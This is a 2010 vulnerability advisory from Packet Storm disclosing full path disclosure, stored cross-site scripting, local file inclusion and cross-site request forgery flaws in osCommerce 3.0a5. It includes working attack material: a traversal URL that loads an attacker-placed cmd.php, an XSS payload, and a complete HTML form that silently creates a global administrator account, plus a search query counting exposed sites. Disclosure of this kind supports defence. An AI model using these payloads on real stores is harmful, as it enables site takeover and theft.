osCommerce 3.0a5 Cross Site Request Forgery / Cross Site Scripting / Local File Inclusion

2010-04-30T00:00:00
ID PACKETSTORM:89080
Type packetstorm
Reporter Alberto Fontanella
Modified 2010-04-30T00:00:00

Description

                                        
                                            `#  
#  
# Multiple Vulnerabilities in osCommerce  
#  
# [Vendor SW]: osCommerce  
# [Version]: 3.0a5 (but possible all versions)  
# [Vendor URL]: www.oscommerce.com  
# [Tested on]: Ubuntu Server 9.10  
# [Category]: Webapps/0day   
#  
# [Date]: 30 Apr 2010  
# [Author]: Alberto Fontanella  
# [Author WEB]: ictsec.wordpress.com  
# [Author EMAIL]: itsicurezza<0x40>yahoo.it  
#  
#  
# inText:"Powered by osCommerce" -> 6.850.000   
#  
#  
  
  
  
[ 1 ] - [ Full Path Disclosure ]  
  
http://[host]/templates/default/content/index/product_listing.php  
http://[host]/templates/default/content/info/info_contact.php  
...etc  
  
Fatal error: Call to undefined function osc_image() in  
/var/www/templates/default/content/index/product_listing.php on  
line 16  
  
http://[host]/includes/classes/search.php  
...etc  
  
Warning: require(includes/classes/products.php) [function.require]:  
failed to open stream: No such file or directory in  
/var/www/includes/classes/search.php on line 15  
  
Fatal error: require() [function.require]: Failed opening required  
'includes/classes/products.php'  
(include_path='.:/usr/share/php:/usr/share/pear') in  
/var/www/includes/classes/search.php on line 15  
  
  
  
[ 2 ] - [ Persistent XSS ]  
  
http://[host]/products.php?oscommerce-tshirt  
  
Put in Front field: <script>alert("XSS")</script>  
Click "Add to Cart"  
  
Checkout section recalls XSS stored.  
  
  
  
[ 3 ] - [ Local File Inclusion ]  
  
http://[host]/admin/includes/applications/services/pages/uninstall.php?module=../../../../../../../../cmd  
...etc  
  
You have to put cmd.php in /  
  
uid=33(www-data) gid=33(www-data) groups=33(www-data) Linux ubuntu  
2.6.31-14-generic #48-Ubuntu SMP Fri Oct 16 14:04:26 UTC 2009 i686 GNU/Linux   
  
  
  
[ 4 ] - [ XSRF ]  
  
To create a new Administrator with Global Privileges:  
  
<html>  
<body>  
<form action="http://[host]/admin/index.php?administrators&action=save" method="post">  
<input type="text" name="user_name" value="haxor">  
<input type="text" name="user_password" value="hax0r">  
<input type="text" name="modules[]" value="0">  
<input type="hidden" name="subaction" value="confirm"/>  
<input type="submit" value="Save">  
</form>  
</body>  
</html>  
  
...etc  
  
  
[ EOF ]  
`